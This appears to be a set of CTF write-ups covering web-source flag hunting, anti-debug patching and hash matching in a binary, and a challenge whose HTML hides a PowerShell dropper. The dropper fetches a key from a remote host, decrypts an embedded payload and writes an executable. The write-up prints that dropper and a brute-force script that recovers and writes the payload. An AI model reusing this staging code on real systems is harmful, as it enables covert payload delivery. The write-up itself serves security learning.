# Random writeups

## pickleball

Press F12 and read the source: the flag is split across the following parts.

`robots.txt`

![image](https://hackmd.io/_uploads/BJ-twnOjA.png)

`index-f7659d98.js`

![image](https://hackmd.io/_uploads/rk_cvndj0.png)

`index-e2ac387f.css`

![image](https://hackmd.io/_uploads/HJpovhOjA.png)

> KMACTF{p1Ckleb4ll_WitH-uU_piCklepal_5a6b89113abb}

## simple math

At the start of the program there is a block of code like this: the program checks whether the first character of the input string is `E` and then does some processing, but in the end it is just a deliberate distraction by the author.

![image](https://hackmd.io/_uploads/rktUu3dsR.png)

`Entering an input string that starts with E`

![image](https://hackmd.io/_uploads/H10COhOjC.png)

The string the program returns; when I did it, the string here was `ban_da_bi_lua!!!!`

![image](https://hackmd.io/_uploads/Sy_HK2di0.png)

Next, the program checks the first value of the variable `v19`, where `v19` is the return value of the function `sub_7FF661C12040`.

![image](https://hackmd.io/_uploads/HJMYtn_jC.png)

`sub_7FF661C12040`

![image](https://hackmd.io/_uploads/HJh1cn_oA.png)

There is an anti-debug snippet here that changes the returned value of `v19` if we are debugging; patching that snippet out is enough.

![image](https://hackmd.io/_uploads/Bk_Vq3_jA.png)

Below is the real flag-checking routine: the program hashes the input `4` characters at a time and compares each result with the correct hash.

`the program's hashes`

![image](https://hackmd.io/_uploads/ByW7inus0.png)

Doing this for each chunk in turn gives us the flag.

> KMACTF{SUperidol笑容都沒你的甜八月正午的陽光都沒你耀眼熱愛105度的你滴滴清純的蒸餾水}

![image](https://hackmd.io/_uploads/H1-6j3_o0.png)

## ℵ

The author gives us 2 HTML files; let's see what they contain.

![image](https://hackmd.io/_uploads/BJ8T32uiA.png)

When we click `Download`, we are redirected to another page for a few seconds and then redirected again to this page.

`first redirect`

![image](https://hackmd.io/_uploads/rJ9Gan_s0.png)

`second redirect`

![image](https://hackmd.io/_uploads/BJNNan_jA.png)

`Ctrl + U` on `index.html`
![image](https://hackmd.io/_uploads/SJMJRn_jR.png)

Nothing special there.

`Ctrl + U` on `director.html`

![image](https://hackmd.io/_uploads/BJLdRh_sA.png)

There are 2 values hidden as `base64`, which looks quite suspicious.

![image](https://hackmd.io/_uploads/r1hFC3Oj0.png)

```
$cne = "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"
$cne2_get_bytes = ([System.Convert]::FromBase64String($cne))
$MemoryStream = New-Object "System.IO.MemoryStream"
$MemoryStream.Write($cne2_get_bytes, 0, $cne2_get_bytes.Length)
$MemoryStream.Seek(0,0) | Out-Null
$DeflateStream = New-Object System.IO.Compression.DeflateStream($MemoryStream, [System.IO.Compression.CompressionMode]::Decompress)
$StreamReader = New-Object System.IO.StreamReader($DeflateStream)
$enc = ''
while ($line = $StreamReader.Readline()){
    $enc += $line
}
$enc2 = [System.Convert]::FromBase64String($enc)
$AES = New-Object "System.Security.Cryptography.AesManaged"
$AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
$AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$AES.BlockSize = 128
$xb = Invoke-WebRequest -Uri 'http://192.168.1.69/key'
$xxb = [Convert]::ToByte($xb.Content)
$AES.KeySize = 254 + $xxb.Count
$b = [byte[]] -split ("bce7b9e8b581b1a2ada7aaaba7afcdb3cbb4c8b9de80da85d586d28a9e919b92" -replace '..', '0x$& ')
$nB = @()
for ($i = 0; $i -lt $b.Count; $i++) {
    $nB += $b[$i] -bxor $xxb[$i % $xxb.Length];
}
$AES.IV = [byte[]] -split ("3f4528482b4d6251655368566d597133" -replace '..', '0x$& ')
$AES.Key = $nB
$Decryptor = $AES.CreateDecryptor()
$result = $Decryptor.TransformFinalBlock($enc2, 0, $enc2.Length)
$Decryptor.Dispose()
Set-Content Lolita.exe -Value $result -Encoding byte
$DeflateStream.Flush()
$DeflateStream.Close()
```

This program decrypts the `base64` blob above using `AES` in `CBC` mode. The one problem is that we do not yet know what the key is after the XOR.
Look at this part: AES only accepts key sizes of 128, 192 or 256 bits, so we can conclude that the string XORed with the key is 2 bytes long (254 + **2** = 256).

![image](https://hackmd.io/_uploads/HJ0ZgpdiR.png)

Key brute-force script

```
$cne = "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"
$cne2_get_bytes = ([System.Convert]::FromBase64String($cne))
$MemoryStream = New-Object "System.IO.MemoryStream"
$MemoryStream.Write($cne2_get_bytes, 0, $cne2_get_bytes.Length)
$MemoryStream.Seek(0,0) | Out-Null
$DeflateStream = New-Object System.IO.Compression.DeflateStream($MemoryStream, [System.IO.Compression.CompressionMode]::Decompress)
$StreamReader = New-Object System.IO.StreamReader($DeflateStream)
$enc = ''
while ($line = $StreamReader.Readline()){
    $enc += $line
}
$enc2 = [System.Convert]::FromBase64String($enc)
$AES = New-Object "System.Security.Cryptography.AesManaged"
$AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
$AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$AES.BlockSize = 128

# Brute force 2-byte key (the outer loop is labelled so one break leaves both loops)
:search for ($k1 = 0; $k1 -le 255; $k1++) {
    for ($k2 = 0; $k2 -le 255; $k2++) {
        $xxb = [byte[]]@($k1, $k2)
        $AES.KeySize = 254 + $xxb.Count
        $b = [byte[]] -split ("bce7b9e8b581b1a2ada7aaaba7afcdb3cbb4c8b9de80da85d586d28a9e919b92" -replace '..', '0x$& ')
        $nB = @()
        for ($i = 0; $i -lt $b.Count; $i++) {
            $nB += $b[$i] -bxor $xxb[$i % $xxb.Length];
        }
        $AES.IV = [byte[]] -split ("3f4528482b4d6251655368566d597133" -replace '..', '0x$& ')
        $AES.Key = $nB
        $Decryptor = $AES.CreateDecryptor()
        try {
            $result = $Decryptor.TransformFinalBlock($enc2, 0, $enc2.Length)
            $Decryptor.Dispose()
            # Check that the output starts with the "MZ" magic (4D 5A)
            if ($result.Length -ge 2 -and $result[0] -eq 0x4D -and $result[1] -eq 0x5A) {
                Set-Content Lolita.exe -Value $result -Encoding byte
                Write-Output "Successful key: $($xxb[0]), $($xxb[1])"
                Write-Output "File written to Lolita.exe"
                break search
            }
        } catch {
            $Decryptor.Dispose()
        }
    }
}
$DeflateStream.Flush()
$DeflateStream.Close()
```

After a successful decryption we get the following file:

![image](https://hackmd.io/_uploads/ryptxTOoR.png)

Set `eip` to jump into the left branch of the graph and the program decrypts the flag for us.

![image](https://hackmd.io/_uploads/B19y-puiR.png)

> KMACTF{benj_thich_loli_va_goi_om}
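
A note on the key brute-force script above: its `4D 5A` test matches only two bytes, so across 65,536 candidate pads roughly one wrong key is expected to pass by chance. The added example below (not part of the original writeup) filters on the first CBC block and then confirms survivors by following `e_lfanew` to the `PE\0\0` signature. The mask and IV are the ones from the script; the pad `13 37`, the 80-byte PE-like stub and all function names are constructed for illustration.

```powershell
# Added example: the XOR pad 13 37 and the PE-like stub are constructed test data.
function Get-XorKey([byte[]]$Mask, [byte[]]$Pad) {
    $key = New-Object byte[] $Mask.Length
    for ($i = 0; $i -lt $key.Length; $i++) { $key[$i] = $Mask[$i] -bxor $Pad[$i % $Pad.Length] }
    return ,$key
}

function Invoke-AesCbc([byte[]]$Key, [byte[]]$IV, [byte[]]$Data, [int]$Count, [switch]$Encrypt) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode = 'CBC'; $aes.Padding = 'None'; $aes.Key = $Key; $aes.IV = $IV
        $t = if ($Encrypt) { $aes.CreateEncryptor() } else { $aes.CreateDecryptor() }
        return ,$t.TransformFinalBlock($Data, 0, $Count)   # $Count must be a multiple of 16
    } finally { $aes.Dispose() }
}

function Test-PeImage([byte[]]$Buf) {
    if ($Buf.Length -lt 0x40 -or $Buf[0] -ne 0x4D -or $Buf[1] -ne 0x5A) { return $false }
    $lfanew = [BitConverter]::ToInt32($Buf, 0x3C)           # file offset of the PE header
    if ($lfanew -lt 0 -or $lfanew + 4 -gt $Buf.Length) { return $false }
    return ($Buf[$lfanew] -eq 0x50 -and $Buf[$lfanew + 1] -eq 0x45 -and
            $Buf[$lfanew + 2] -eq 0 -and $Buf[$lfanew + 3] -eq 0)
}

function Find-XorPad([byte[]]$Mask, [byte[]]$IV, [byte[]]$Cipher) {
    $hits = @()
    foreach ($k1 in 0..255) { foreach ($k2 in 0..255) {
        $key  = Get-XorKey $Mask ([byte[]]($k1, $k2))
        $head = Invoke-AesCbc $key $IV $Cipher 16            # stage 1: first block only
        if ($head[0] -ne 0x4D -or $head[1] -ne 0x5A) { continue }
        $full = Invoke-AesCbc $key $IV $Cipher $Cipher.Length   # stage 2: MZ survivors only
        if (Test-PeImage $full) { $hits += '{0:x2}{1:x2}' -f $k1, $k2 }
    } }
    return $hits
}

$mask = [byte[]] -split ("bce7b9e8b581b1a2ada7aaaba7afcdb3cbb4c8b9de80da85d586d28a9e919b92" -replace '..', '0x$& ')
$iv   = [byte[]] -split ("3f4528482b4d6251655368566d597133" -replace '..', '0x$& ')
$pe = New-Object byte[] 80                                   # constructed stub: MZ, e_lfanew=0x40, PE\0\0
$pe[0] = 0x4D; $pe[1] = 0x5A; $pe[0x3C] = 0x40; $pe[0x40] = 0x50; $pe[0x41] = 0x45
$cipher = Invoke-AesCbc (Get-XorKey $mask ([byte[]](0x13, 0x37))) $iv $pe $pe.Length -Encrypt
Find-XorPad $mask $iv $cipher                                # lists every pad that yields a valid PE
```

Because only candidates that pass the one-block check are decrypted in full, the search also avoids decrypting the whole payload 65,536 times.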